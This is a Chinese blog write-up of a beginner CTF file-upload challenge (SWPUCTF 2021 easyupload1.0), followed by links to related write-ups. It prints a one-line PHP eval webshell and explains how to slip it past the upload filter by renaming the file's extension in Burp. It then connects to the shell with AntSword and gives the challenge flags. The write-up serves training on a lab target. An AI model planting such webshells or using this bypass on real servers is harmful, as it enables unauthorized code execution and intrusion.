[SWPUCTF 2021 新生赛]easyupload1.0

于 2024-09-07 11:05:38 发布
阅读量366 收藏 3
点赞数 3
分类专栏: CTF比赛WP 文章标签: CTF php 网络安全 web安全 笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_73049307/article/details/141992665
版权

开启NSSCTF靶场,打开链接:

发现要上传.jpg文件

创建1.jpg文件,在记事本中编写一句话木马:

<?php eval($_POST['pass']);?>

上传1.jpg,用burp抓包,在重放器中修改.jpg后缀为.php,发送请求查看一下页面渲染:

显示上传成功,并且1.php的文件路径是....../upload/1.php

成功之后再去抓到的真正的包的.jpg修改为.php

用中国蚁剑成功连接:

经过一番查找发现了flag.php文件:

改成NSSCTF{}的格式:

NSSCTF{I_d0nt_w4nna_wak3up}

但却显示flag错误,看来是障眼法

用hackbar查看phpinfo();,Ctrl F查找关键词flag:

得到flag:

NSSCTF{16693cea-6750-4fd8-b186-803d3a512fe1}

南暮思鸢
关注
专栏目录
[SWPUCTF 2021 新生]sql - 联合注入
oZuoShen123的博客
10-07 799
Your Login name:id,flag —— 这里复习了一下任意匹配字符,一开始都以为不用加%,差点忘记了。Your Login name:LTLT_flag,users —— 得到LTLT_flag。1、fuzz看哪些关键字被过滤:空格、substr、=被过滤。这题相比于参考文章的题目多了waf过滤。首先,仍然是网站标题提示参数是wllm。
[SWPUCTF 2021 新生]crypto(1~9)详细解题思路集外代软件安装,拓展安装,库函数安装
最新发布
符啸九天的博客
09-05 543
[SWPUCTF 2021 新生]crypto6 [SWPUCTF 2021 新生]crypto7 [SWPUCTF 2021 新生]crypto8 [SWPUCTF 2021 新生]ez_caesar解题思路
ctf (easyupload1.0)
Glacier_Mount的博客
06-29 1169
简单的文件上传题
NSSCTF | [SWPUCTF 2021 新生]easyupload1.0
2302_80946742的博客
05-19 494
但是这里蚁剑连接后得到的flag是假的,没办法了,只能看看phpinfo里面有没有。使用同样的绕过方式,传入phpinfo.php文件,然后访问。可以看到GIF89a,说明一句话木马已经上传成功了,并且被服务器成功解析执行。接下来我们就可以使用HackBar进行命令执行。可以看到ls命令是有作用的。将ContentType修改为image/jpeg即可成功上传。可以看到右边回显了文件上传成功的路径,我们去访问试试看。直接传一句话木马显然是行不通的。果然,能够搜索到flag。
NSSCTF刷题笔记web11——[SWPUCTF 2021 新生]easyupload1.0
qq_45692883的博客
01-18 605
修改png后缀为php发现可以上传。直接在内容中写入一句话木马即可。这个用burp抓包会方便很多。访问路径,执行命令即可。
CTF】[SWPUCTF 2021 新生]easyupload1.0
西原一点红的博客
06-20 623
响应直接访问,获得flag。
【NSSCTF】刷题记录——[SWPUCTF 2021 新生]系列(CRYPTO篇)
jameshuangchuan的博客
08-28 1164
刚经过reverse的折磨又来?分析可得原文经过了三层加密,按顺序分别是base64、base32、base16,那倒序逐层解密就完事了。看着像是MD5加密过的。字符串复制粘贴到在线MD5解密工具上跑吧。第一次提交flag把牵前面的b'带上了,报错,去掉之后就对了。刚好前段时间刷到到过一篇文章讲猪圈密码的,直接对着看就行。碰到UUEncode解密的时候出现了flag。感觉没看出来啥规律,只好拿出工具无脑碰运气。此处主要在NSSCTF平台(……得到flag是md5yyds。
[SWPUCTF 2021 新生]
snowlyzz的博客
09-11 1614
。。
CTF笔记 [SWPUCTF 2021 新生]pop
qq_51248658的博客
10-28 3077
这一类题目比较考验对一段代码的逻辑方面的理解,通过利用魔数方法进行互相调用,形成一条链子,利用这条链子将对象联系起来去拿flag。
[SWPUCTF 2021 新生]easyupload1.0(一句话木马+蚁剑+.htaccess)
2401_84499442的博客
07-06 368
搞笑的是,直接上传成功了,那这一题就是非常简单的入门题了,然后再用蚁剑连接,直接得到flag。哈哈,那算了吧,看来这条路行不通,那这一题就是简单地修改文件后缀即可绕过。首先,关注题目标签,试着上传一句话木马1.php,密码为a。先上传.htaccess文件,修改jpg文件为可执行文件。那咱们再试试修改配置文件能不能写这一题。
【NSSCTF】刷题记录——[SWPUCTF 2021 新生]系列(WEB篇)
jameshuangchuan的博客
08-08 3181
此处主要在NSSCTF平台()上开展刷题。
[SWPUCTF 2021 新生]gift_F12
qq_35881369的博客
05-25 610
[SWPUCTF 2021 新生]gift_F12 黑客入门
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值